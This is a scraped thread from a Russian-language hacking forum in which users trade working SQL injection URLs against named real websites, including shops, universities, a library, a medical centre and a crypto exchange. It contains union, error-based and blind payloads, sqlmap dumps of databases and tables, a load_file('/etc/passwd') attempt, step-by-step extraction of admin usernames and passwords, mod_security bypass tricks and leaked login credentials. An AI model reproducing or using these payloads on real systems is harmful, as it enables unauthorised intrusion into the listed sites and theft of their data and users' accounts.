http://www.so-toulouse.com/index.php?id=167&act=-68+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27+--+

Code:
http://mobile-phone-buy.ru/buy_mobile.php?pc=DOOGEE-T5%27+union+all+select+%27%3E%3Cscript%3Ealert("Hacked By extjs")%3C/script%3E%27--+

http://www.casuals.ru/product_info.php/products_id/11164'%20and%20extractvalue(0x00,concat(0x0a,(sele ct%20table_name%20from%20information_schema.tables %20where%20table_name%20like%20'%25user%25'%20limi t%203,1)))--%20/category/1

550 тиц


Code:
http://www.landscrona.ru/tales/index.php?id=-111+union+select+1,2,3,@@version,5,6,7,8,9,10,11,1 2,13,14,15,16+--+

30 тиц


Code:
http://www.avon-beauty.ru/index.php?show_aux_page=(ExtractValue(1,concat(0x3 a,(select(version())))))

60 тиц


Code:
http://sejo.ru/index.php?page=119+union+select+1,2,3,4,@@version, 6,7,8,9,10,11+--+1

Внизу

Code:
view-source:http://www.nesprosta.ru/?type=content&id=29'



HTML:

База данных квартир: купить квартиру в Москве, снять квартиру (Москва), цены на квартиры, объявления недвижимость - Nesprosta.ru




Code:
http://www.trest14perm.ru/newbuildings/?show_id=37+and+1=10+uNion+all+select+1,2,3,4,5,6, 7--



HTML:
SQL Error: The used SELECT statements have a different number of columns at /home/trest14prm/trest14perm.ru/docs/wbk-cms/module/objects.php line 47
Array
(
[code] => 1222
[message] => The used SELECT statements have a different number of columns
[query] => SELECT DISTINCT * FROM geocard,geomarks WHERE act=1 and geocard.type=geomarks.id and obj1=37 and 1=10 uNion all select 1,2,3,4,5,6,7-- GROUP BY type
[context] => /home/trest14prm/trest14perm.ru/docs/wbk-cms/module/objects.php line 47
)




Code:
http://kras-city.ru/info_krsnr.php?num=1%27+union+all+select+1,2,3,4,5 ,6,7,8,9,10,(select(@)from(select(@:=0x00),(select (0)from(information_schema.columns)where(table_sch ema!=0x696e666f726d6174696f6e5f736368656d61)and(0x 00)in(@:=concat(@,0x3c6c693e,table_schema,0x2e,tab le_name,0x3a,column_name))))a),12--+[

Это как обойти?


Code:
http://www.meatbranch.com/advert/magazine.html'+and+'1'='1



Code:
http://www.teplopoint.ru/'--+[



Code:
http://www.zorginox.ru/sobitiya/504/'%20and%20'1'='1

Code:
http://an-tarusa.ru/View.aspx?id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

все равно не знаю, что с этим Jet Database делать

https://www.holmesdale.net/link.php?id=-3+union+select+111+--+

АО «Сибирский реестр»


Code:
http://www.sibreg.ru/doc.php?id=-13827+union+select+1,2,3,concat_ws(0x3a,version(), database(),user()),5,6,7,8,9,10--&menu=about

Clínica Medilaser Neiva


Code:
http://www.clinicamedilaser.com.co/branch.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5--

Code:
http://www.kupa.pl/pl/humor.php?id=16

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=16 AND 1103=1103

Type: AND/OR time-based blind

Title: MySQL

available databases [15]:

cursosoxford

information_schema

moodle

mysql

oxfordazuero2015

oxfordazuero2016

oxfordazuero2017

oxforddavid2016

oxforddavid2017

oxfordsantiago2015

oxfordsantiago2016

oxfordsantiago2017

performance_schema

phpmyadmin

temp

http://oxfordsantiago.com/index.php...ng_id=68&Itemid=650&establename=massmessaages (http://oxfordsantiago.com/index.php?option=com_extrasearch&view=details&listing_id=68&Itemid=650&establename=massmessaages)

Code:
http://adamslove.org/en-d.php?id=85

(GET)

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=85' AND 1057=1057 AND 'wZNL'='wZNL

SlipX said:
↑ (https://antichat.live/posts/4115704/)

Code:
http://adamslove.org/en-d.php?id=85

(GET)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=85' AND 1057=1057 AND 'wZNL'='wZNL


Ну и кому это нужно?

не смог докрутить, blind

SlipX said:
↑ (https://antichat.live/posts/4115724/)
не смог докрутить, blind




Code:
http://adamslove.org/en-d.php?id=85'+or+1+group+by+mid(version(),rand(0)|0 )having+avg(0)%23

MySQL error: 1062 (Duplicate entry '5.5.51-38.2' for key 'group_key')

Где ж тут Blind? Или Вы всегда полагаетесь только на sqlmap? И да, там присутствует Mod_security, потому используем нестандартные пробелы и загоняем операторы в комментарии с версией(пример /*!12345union*/%0aselect)!

простите за флуд, но на кой хер выставлять ссылки на уязвимые сайты если ты элементарно не можешь эту уязвимость раскрутить?

а теперь по теме:


Code:
http://www.imrs.rs/index.php?id=-67+union+select+1,2,3,4,5,database(),7,8,9,10,11,v ersion(),13,14,15,16,17,18,19,20,21--

target: http://www.tissueeng.net

type:SQL Injection


Code:
http://www.tissueeng.net/lab/peopleDetail.php?id=-424+/*!50000union*/+/*!50000select*/+1,user(),3,4,5,version(),7--+


user: tissueen_erikp@localhost

version:5.6.32-78.1-log

.SpoilerTarget" type="button">Spoiler
http://www.kandiusa.com/product_list.php?id=1

Database: kandiusa

+---------+---------+

| Table | Entries |

+---------+---------+

| custom | 8877 |

| product | 4703 |

| orderm | 3843 |

| parts | 597 |

| class | 372 |

| sort | 76 |

| wty | 3 |

| admn | 2 |

| reg | 1 |

+---------+---------+

.SpoilerTarget" type="button">Spoiler: bd
http://www.cambridgesilversmiths.com/browse/detail.php?id=2504

available databases [48]:

CamSilWeb

Crystal

cs_dev_ecommSQL

cs_ecommSQL

CZOC

d2

Data_005

DATA_020

DATA_021

DATA_022

DATA_55

DATA_56

DATA_999_ARCHIVE

DATA_ARCHIVE

DataLF

DemoSynergy

distribution

EDI_2

EDI_CS_TEMP

EEDI_CS

FedEx

GENTRANDatabase

Issues

KS_Inbox

KS_Object

master

model

msdb

msllockdb

Northwind

pubs

PWE

Screens

Spanish

swWorkFlow

Synergy

TaxTables

tempdb

Ticketing

UPS

vendor_dev

vendor_test

VendorLF

vpEDI_Company

zWMS_CA

zWMS_dev

zWMS_PreMigration

zWMS_Test_NJ

http://www.pinoy-market.com/store.php?id=136

available databases [5]:

information_schema

mysql

ofertas

pinoy

test

http://www.ecgi.de/wp/wp_id.php?id=213

available databases [3]:

db1081552-ecgi1

db1081552-ecgi2

information_schema

http://www.kupa.pl/pl/humor.php?id=16

available databases [1]:

baza777

// Не надо флудить однообразными сообщениями.

// Объединяй в 1 пост, не создавай модераторам лишней работы

// ВВ

tvet.ps/home.php?org=43

available databases [2]:

information_schema

tvetps_db

Code:
http://www.pizzifarm.com/printerfriendly.php?id=-25+union+select+version()+--+

4.1.20

ЗАО НПЦ «АСПЕКТ»


Code:
http://aspect.dubna.ru/new/news.php?id=-222+union+select+@@version--

Code:
http://www.immobilien-bender.com/download_blob.php?ID_KATALOG_FILE=99' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a787a71, 0x556a6d655550696468517a6654417a59597750744f654b71 64566e64624876594f58704345774b72,0x7170706a71),NUL L,NULL,NULL,NULL,NULL-- WNxl

http://mycompaniesact.com/orders.php?id=401


Code:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=401' AND 5514=5514 AND 'bTax'='bTax

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=401' AND (SELECT 9875 FROM(SELECT COUNT(*),CONCAT(0x7170627871,(SELECT (ELT(9875=9875,1))),0x7162717a71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'niid'='niid

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=401' AND SLEEP(5) AND 'TmYG'='TmYG

Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=401' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717062 7871,0x4975495a54675364526f6847444d55556c714d50736 1564a62794f486f5242756f6b65674d436f48,0x7162717a71 )-- srbU
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
available databases [24]:
cashflow
cashflowblog
cim
complyzone
complyzoneblog
gstcomplyzone
gstseekho
gstseekhoapp
information_schema
mppcos
mycompaniesact
mycompaniesact_blog
mysql
performance_schema
permier
phpmyadmin
punitecom
rishab
sammiraman
ssluthra
trackmyinvoice
uniqueshiksha
unocalecom
Vendor_Payment_Generation

BabaDook said:
↑ (https://antichat.live/posts/4135597/)
Слабо шелл залить ?


К сожелению да, не так силен в этом незнаю с чего начать даж

Был бы кто научит)

http://www.sfgames.ru/gameS.php?id=232


Code:
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 268 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=232 AND 5858=5858

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=232 AND SLEEP(5)
---
[18:55:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12

Code:
https://video.bbb.org/vncSearch.php?category=13 UNION ALL SELECT NULL,CONCAT(0x716a6a7671,0x644b4861496f58545558536 8634d4e6c55486a43776876725058495543634550414945467 4624f61,0x716a786b71),NULL,NULL,NULL,NULL-- ERFG&bureauId=
available databases [3]:
bbbvideo
information_schema
test

Code:
http://de.u7buy.com/news/news.html?date=2016-09%' AND 1010=1010 AND '%'='
available databases [1]:
u7buy_dbs

Code:
http://smmmafia.com/gobig/tnsnfri/rcknrol.php?geo=US' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x6e4e5a72734174575a6f694 6495a77786d4142695a6c6b5a594c647a6b694641465742647 9557962,0x71767a6b71)-- hajN

Есть идеи что за сайт и для чего он?

http://www.vpscro.com/cn/about.php?id=166


Code:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=166 AND 3378=3378

Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=166 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171627071,(SELECT (ELT(2938=2938,1))),0x7178627071,0x78))s), 8446744073709551610, 8446744073709551610)))

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=166 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: id=-4940 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627071, 0x794e677a4367776d4c75676a55677158705a414c684b4468 6c4b67546f545979546e4d636c594a53,0x7178627071),NUL L,NULL,NULL,NULL,NULL-- FkYN
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, PHP 5.5.10, Microsoft IIS 7.0
back-end DBMS: MySQL >= 5.5
available databases [18]:
bugtracker
dzzoffice
eyao
hdm0130219_db
hdm0580028_db
information_schema
mysql
performance_schema
pigcms
test
tsoa
ucenter
uchome
vp_phpcms
vp_xcx
vppr
wecenter
wqjk

Не получается вывести колонки из таблиц, у кого получится скиньте вектор в пм.

аккаунты для входа(без них работать не будет)


Code:
hopkins123:hopkins1
KlausuPirelli:pirelli1
Vishnu24:Ackbar24
momoneyg08:wordupho



Code:
http://www.pacinonetworkpass.com/members/frame.php?site=lazonamodelos/content.php?show=models&id=368+and+updatexml(NULL,concat(0x3a, ( select database()) ),Null)-- -&template_set=3
XPATH syntax error: ':sitedepth'

http://www.pacinonetworkpass.com/members/frame.php?site=lazonamodelos/content.php?show=models&id=368+ OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(database(), 1, 63), FLOOR(RAND(0)*2)))-- -&template_set=3
Duplicate entry 'sitedepth1' for key 'group_key'

tables:
userman
site_settings
users

http://www.golf-in-japan.com/course.php?ID=372

+ bd mail hach username



https://yadi.sk/i/pxTpczCR3NmKpt




Code:
---
Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=372 AND 5008=5008

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ID=372 AND (SELECT 1815 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(1815=1815,1))),0x71786b6a71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: ID=372 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 32 columns
Payload: ID=-3043 UNION ALL SELECT NULL,NULL,CONCAT(0x71766a7071,0x6f49475068796d4375 5072586e44506f504d575573424141775657754b625a736857 4a554c6a6678,0x71786b6a71),NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL-- uzrc
---
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
available databases [2]:
gij_db
information_schema

http://www.odontoprimegroup.com/about.php?id=4


Code:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=4' OR NOT 9339=9339#

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=4' AND SLEEP(5)-- iguT
---
web application technology: Apache, PHP 5.4.22
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
information_schema
odonto_odo

http://remiremont.fr/associations/detail.php?id=68


Code:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=68 OR (SELECT 8037 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(8037=8037,1))),0x71707a7671,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=68 OR SLEEP(10)

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: id=68 UNION ALL SELECT NULL,CONCAT(0x7176627071,0x674772756c78427a446a624 8755a6e67426e6c47675a546e5449546456755a7257426c534 b6b7961,0x71707a7671),NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL-- RzWd
---

http://gloomysunday.hu/shop.php?id=9


Code:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-7104 OR 6087=6087#

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=9 AND (SELECT 5231 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(5231=5231,1))),0x71787a6b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=9 OR SLEEP(10)
---

New Jersey State Opera


Code:
http://www.njstateopera.org/news.php?id=-6+union+select+1,2,version(),4,database(),6,7,user ()--

Code:
http://www.salut.ru/ViewTopic.php?Id=2325
http://www.salut.aero/info.php
view-source:http://www.salut.ru/ViewTopic.php?Id=-2325%27+union+select+1,2,3,user(),5,6,database(),v ersion(),9,10,11,12,13,14,15,16%20--%20ccv
| 5.1.67-0ubuntu0.10.04.1 | salut | salut@localhost

target: http://atmarine.fi

type:Error-Based

user:w8400337db@10.0.8.89

db:5.5.51-MariaDB


Code:
http://atmarine.fi/index.php?id=2 AND (SELECT 2796 FROM(SELECT COUNT(*),CONCAT_WS(CHAR(32,58,32),user(),database( ),version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

target: http://www.ubraintv.com

type:Union-Based

user:ubraintv@localhost

db:5.1.73 MySQL


Code:
http://www.ubraintv.com/watchchannel.php?id=6' UNION ALL SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),ver sion()),4,5,6,7-- -

www.yorgasmic.com/article.php?id=148 (http://www.yorgasmic.com/article.php?id=148)


Code:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=148 AND 3436=3436

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=148 OR (SELECT 2443 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2443=2443,1))),0x7178706b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=148 AND SLEEP(5)
---

ALEXA 12,361



Code:
http://singtao.ca/events/Thatcher/article.php?ID=1+union+all+select+null,null,null,l oad_file('/etc/passwd'),null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null--

http://www.aseanmarketplace.net/featured-listings.php?id=


Code:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-2582 OR 5132=5132

Type: AND/OR time-based blind
Title: MySQL time-based blind - Parameter replace (MAKE_SET)
Payload: id=MAKE_SET(8180=8180,SLEEP(5))
---

available databases [2]:

amp

information_schema

Table: admin

[1 entry]

+----+----------+----------------------------------+

| id | username | password |

+----+----------+----------------------------------+

| 1 | читаем | первый пост |

+----+----------+----------------------------------+

в админпанельку как бы попасть в /administrator не пускает...

как быть - мож кто подскажет....

Code:
http://bw-plast.com/en/news.php?id=-2+union+select+1,2,3,4,version(),user(),7,database (),9,10,11,12,13,14--



Code:
http://www.jmtv.com/news.php?id=-3+union+select+1,version(),database()--

Code:
http://plasticospardo.com/english/noticias.php?id=-16+union+select+1,2,version(),4,database(),user(), 7--

PHP:
http://manul.tv/watch_video.php?v=R6DW4G16RRS8%27+and+false+union+ select+database(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3,4,5,6,7,8,9,0+--+-

target: http://illan-gifts.ru

type: Error-Based

user: wapp@localhost

version:5.5.52-MariaDB


Code:
http://illan-gifts.ru/1'and(ExtractValue(1,concat(0x5c,(user()))))and'

Code:
http://www.jamestrussart.com/gallery.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11

Выводится 2 номер.

Code:
https://c2-europe.eu/news-full.php?id=-1049+union+select+1,2,3,version(),5,6,database(),8 ,9,10,user(),12,13,14--



Code:
http://monroerec.com/event.php?id=-24%27+UnIOn+SeLEcT+1,2,3,4,5,6,version(),8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22+--+

Code:
https://www.unique-vintage.com/apps/swymEmails/interfaces/interfaceStore.php?appname=Emails
Parameter: appname (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: appname=Emails' AND 8893=8893-- ZiPX
---
[12:48:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
available databases [5]:
information_schema
mysql
pbcomput_swym
performance_schema
sys

Code:
https://www.mato-gmbh.com/produkte/mview'and(extractvalue(null,concat(1,(select+user( )))))='1/251/?PHPSESSID=99f3768df8485b713f55dc60de16c1aa

DA49


Code:
https://www.bfz.de/seminarfinder?the_id=13&zieg_id=-8+union+select+1,2,3,4,5,6,7,8,@@version,10,11,12, 13,14,15,16,17+--+&foern_id=1&vanort=&umkreis=10&stichwort=&sort=entf&submitted=1

Microsoft SQL Server 2008 R2 (SP3)

https://www.flemings-hotels.com/index.php?&lang=ger&ajax=subcat&id=1'+union+select+user()+--+

http://www.elektronika.ru/index.php...s(0x3a3a,version(),user(),database()), 3,4,6-- (http://www.elektronika.ru/index.php?option=com_brand&brand=25000000/**/Union+select/**/1,concat_ws(0x3a3a,version(),user(),database()),3, 4,6--)

5.5.52-MariaDB::edbuser@localhost::elektronika

Биржа крипты, слепая инъекция.


Code:
sqlmap -u "https://www.ccnex.com/index.php?before_group=3&c=member_controller&m=upgrade&now_group=5&s=help&username=if" -p "username" --dbms=mysql --level=3 --risk=3 --random-agent --dbs

Code:
http://top.magreklama.ru/
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=260 AND 9312=9312

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=260 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=-3254 UNION ALL SELECT CONCAT(0x71766a6a71,0x686e626c4b547a41514a78415246 66765564447557656e73737257757144446b48456943704754 58,0x717a767871)-- Tzua
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12

Расшифрованные хеши из таблицы rekl_kv_naozero.users виде hashass

http://zalil.su/6334652

https://ratingdatings.ru/1'or(ExtractValue(1,concat(0x3a,(select(version()) ))))='1

Code:
ТЕКОМ - является динамично развивающейся телекоммуникационной компанией, накопившей солидный опыт в области проектирования, поставках и монтаже оборудования связи, а также предоставляющей услуги связи и доступа в Интернет. Мы предлагаем нашим клиентам эффективное и оперативное решение возникающих задач, связанных с организацией телефонной связи и эксплуатацией телекоммуникационного оборудования.



Code:
http://www.tecom.ru/internet.php?id=-3+union+select+1,version(),database()--

Писал админам, но им оказалось похер на всё, так что решил выложить сюда...

P.S. Также там есть ещё Административный Интерфейс CommuniGate Pro


Code:
http://81.3.154.236:8010/Master/MainAdmin/

Code:
https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,4,5,6,7,8,9--



Code:
https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6,7,8,9--



Code:
https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,table_name,5,6,7,8,9+from+in formation_schema.tables+limit%201,1--

поменял...

Code:
http://www.exxiasports.com/eventos.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10--



Code:
http://www.exxiasports.com/eventos.php?id=-2+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10--

Code:
http://www.nichegardens.com/catalog/item.php?id=-1235+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35--



Code:
http://www.nichegardens.com/catalog/item.php?id=-1235+union+select+1,2,3,4,concat_ws(0x3a,version() ,database(),user()),6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35--

John Lawrence Detwiler Memorial Library - Adventist University of the Philippines


Code:
http://jldmlibrary.aup.edu.ph/subcontent.php?id=-5+union+select+1,2,3,4,5--



Code:
http://jldmlibrary.aup.edu.ph/subcontent.php?id=-5+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5--



Code:
http://jldmlibrary.aup.edu.ph/subcontent.php?id=-5+union+select+1,table_name,3,4,5+from+information _schema.tables+limit+37,8--



Code:
http://jldmlibrary.aup.edu.ph/subcontent.php?id=-5+union+select+1,column_name,3,4,5+from+informatio n_schema.columns+where+table_name=%27user%27+limit +0,3--



Code:
http://jldmlibrary.aup.edu.ph/subcontent.php?id=-5+union+select+1,username,3,4,5+from+user+limit+0, 1--



Code:
http://jldmlibrary.aup.edu.ph/subcontent.php?id=-5+union+select+1,password,3,4,5+from+user+limit+0, 1--

International Leasing SecuritiesLtd.
Версия БД:


Code:
http://www.ilslbd.com/content.php?Id=1%27or(ExtractValue(1,concat(0x3a,( select(version())))))=%271

находим нужную таблицу:


Code:
http://www.ilslbd.com/content.php?Id=-1%27+UNION+select+1,2,convert(table_name%20using%2 0latin1)+from+information_schema.tables+limit+45,1 +--+

играемся с лимитом и получаем нужную колонку:


Code:
http://www.ilslbd.com/content.php?Id=-1%27+UNION+select+1,2,convert(column_name%20using% 20latin1)+from+information_schema.columns+where+ta ble_name=%27admin%27+limit+3,1+--+

получаем админский логин


Code:
http://www.ilslbd.com/content.php?Id=-1%27+UNION+select+1,2,convert(UserName%20using%20l atin1)+from+admin+limit+0,1+--+

ну а дальше сами...

Code:
http://www.ub.edu/aqr/fitxa-persones_en.php?id=-8+/*!12345uNIoN*/+/*!12345sELecT*/+1,2,3,user()+--+

https://www.uni-hohenheim.de/politm...l.php?id=-25+union+select+1,2,3,4,5,6,7,8+--+ (https://www.uni-hohenheim.de/politmonitor/analysen_detail.php?id=-25+union+select+1,2,3,4,5,6,7,8+--+)

DezMond™ said:
↑ (https://antichat.live/posts/4274551/)
https://www.uni-hohenheim.de/politm...l.php?id=-25+union+select+1,2,3,4,5,6,7,8+--+ (https://www.uni-hohenheim.de/politmonitor/analysen_detail.php?id=-25+union+select+1,2,3,4,5,6,7,8+--+)


Докрутил ))


Code:
https://www.uni-hohenheim.de/politmonitor/analysen_detail.php?id=-25+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8+--+



Code:
https://www.uni-hohenheim.de/politmonitor/analysen_detail.php?id=-25+union+select+1,table_name,3,4,5,6,7,8+from+info rmation_schema.tables+limit+17,1+--+

==================================

и кое-что от себя:

IraqParliamentMonitor


Code:
http://www.miqpm.com/new/English/News.php?ID=-1+union+select+1,2,3,4,5--



Code:
http://www.miqpm.com/new/English/News.php?ID=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5--



Code:
http://www.miqpm.com/new/English/News.php?ID=-1+union+select+1,2,table_name,4,5+from+information _schema.tables+limit+0,77--

Dr. Khuroo’s Medical Centre


Code:
http://www.drkhuroo.in/news.php?id=-9%27+/*!12345uNIoN*/+/*!12345sELecT*/+1,2,3,4,5,6,7,8+--+



Code:
http://www.drkhuroo.in/news.php?id=-9%27+/*!12345uNIoN*/+/*!12345sELecT*/+1,concat_ws(0x3a,version(),database(),user()),3,4 ,5,6,7,8+--+



Code:
http://www.drkhuroo.in/news.php?id=-9%27+/*!12345uNIoN*/+/*!12345sELecT*/+1,table_name,3,4,5,6,7,8+from+information_schema. tables+limit+90,1+--+

Aayojan School of Architecture


Code:
http://www.aayojan.edu.in/jaipur/events_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10--



Code:
http://www.aayojan.edu.in/jaipur/events_detail.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),database(),user()),9,10--



Code:
http://www.aayojan.edu.in/jaipur/events_detail.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10+from+ information_schema.tables+limit%2059,1--



Code:
http://www.aayojan.edu.in/jaipur/events_detail.php?id=-1+union+select+1,2,3,4,5,6,7,column_name,9,10+from +information_schema.columns+where+table_name=%27ad min_login%27+limit%203,5--

The Regional Center for Social Science and Sustainble Development

ChiangMaiUniversity


Code:
http://rcsd.soc.cmu.ac.th/home/index.php?button=Submit&ptype=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+&sfile=publication



Code:
http://rcsd.soc.cmu.ac.th/home/index.php?button=Submit&ptype=-3+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12+--+&sfile=publication



Code:
http://rcsd.soc.cmu.ac.th/home/info.php


P.S. Дальше было лень...

ОАО «Брест - ВТИ»


Code:
http://brestvti.by/product.php?id=-115+union+select+1,2,3,4,5,6--



Code:
http://brestvti.by/product.php?id=-115+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6--

Actuaries


Code:
http://www.actuaries.org.hk/education.php?id=13%27%20union%20select%201,%27tab le%27,3,concat_ws(0x7C,user(),database(),%20versio n()),5,6,7,8,9,10,11,12,13,14,15,16,17,18--+#

actuarie_db@localhost|actuarie_db|5.7.25

lltours


Code:
http://www.lltours.com.ve/hoteles/ficha-promo.php?id=69%20and%20false%20union%20select%201 ,2,3,concat_ws(0x7C,user(),database(),%20version() ),5,6,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34

lltourssysweb@localhost|lltours|5.5.62-0+deb8u1

Aryapg College


Code:
https://www.aryapgcollege.com/event.php?id=67%20and%200=1%20union%20select%201,2 ,%27tables%27,concat_ws(0x7C,user(),database(),%20 version()),5

aryapgco_a9p8g7c@localhost|aryapgco_collegepgarya9 649|10.0.38-MariaDB

WignWeaveстоит за Mod_Security


Code:
http://www.wignweave.com/event.php?id=-34+/*!50000union*/+/*!50000select*/+1,2,%203,4,5,concat_ws(0x7C,user(),database(),ver sion())--+

wignweav_shop@localhost|wignweav_shop|5.6.41-84.1

Sprint15


Code:
